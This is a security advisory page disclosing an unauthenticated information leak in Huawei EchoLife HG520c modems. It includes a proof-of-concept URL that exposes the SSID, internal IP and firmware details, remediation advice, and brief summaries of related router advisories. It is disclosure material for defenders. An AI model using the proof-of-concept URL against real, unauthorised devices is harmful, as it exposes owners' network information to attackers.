Skip to main content
Websec Logo
Medium May 16, 2010

Huawei EchoLife HG520c Information Disclosure

Huawei EchoLife HG520 modems are vulnerable to an information disclosure vulnerability. Sensitive modem information can be accessed using a public URL in modems with the web interface activated.

CVSS Score

5.3 / 10.0

Severity

Medium

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Advisory

DeviceHuawei EchoLife HG520c
Firmware3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0
SoftwareV100R001B021Telmex, V100R001B020Telmex
LocationWeb administration interface (LAN/WAN)
Websec AdvisoryWS10-11

Description

The page /Listadeparametros.html reveals software version, internal IP, SSID, and other sensitive modem information. No authentication is required to access it.

Exploit / Proof of Concept

From the LAN (or client-side with the WAN interface disabled):

http://192.168.1.254/Listadeparametros.html

If the remote admin interface is enabled on the WAN:

https://<router-wan-ip>/Listadeparametros.html

Remediation

Disable remote web administration; apply vendor firmware update if available.

Share this advisory:

Related Security Advisories

Stay informed about other recent vulnerabilities and security advisories

Critical December 18, 2014

Command Execution and Backdoor in Zhone GPON-2520

This post will describe a backdoor account found in the Zhone GPON-2520 and will provide a PoC which can be used to disable the firewall filtration rules in order to allow access to services such as ssh, telnet and ftp.

Severity:
CVSS: 9.8
View advisory
High May 22, 2014

Huawei HG8245 / HG8247 WPA Generator

Huawei HG8245 & HG8247 ONT (firmware version V1R006C00S100) rely on a weak algorithm to calculate the WPA keys, keys can be predicted easily using the WiFi's MAC Address (BSSID).

Severity:
CVSS: 7.4
View advisory
High December 19, 2013

Arbitrary Command Execution in Alcatel-Lucent I-240W-Q

The Alcatel-Lucent I-240W-Q ONT's Diagnostics page does not filter shell metacharacters in the IP address field, allowing any authenticated administrator to execute arbitrary commands as root and fully compromise the device.

Severity:
CVSS: 8.0
View advisory
View All Advisories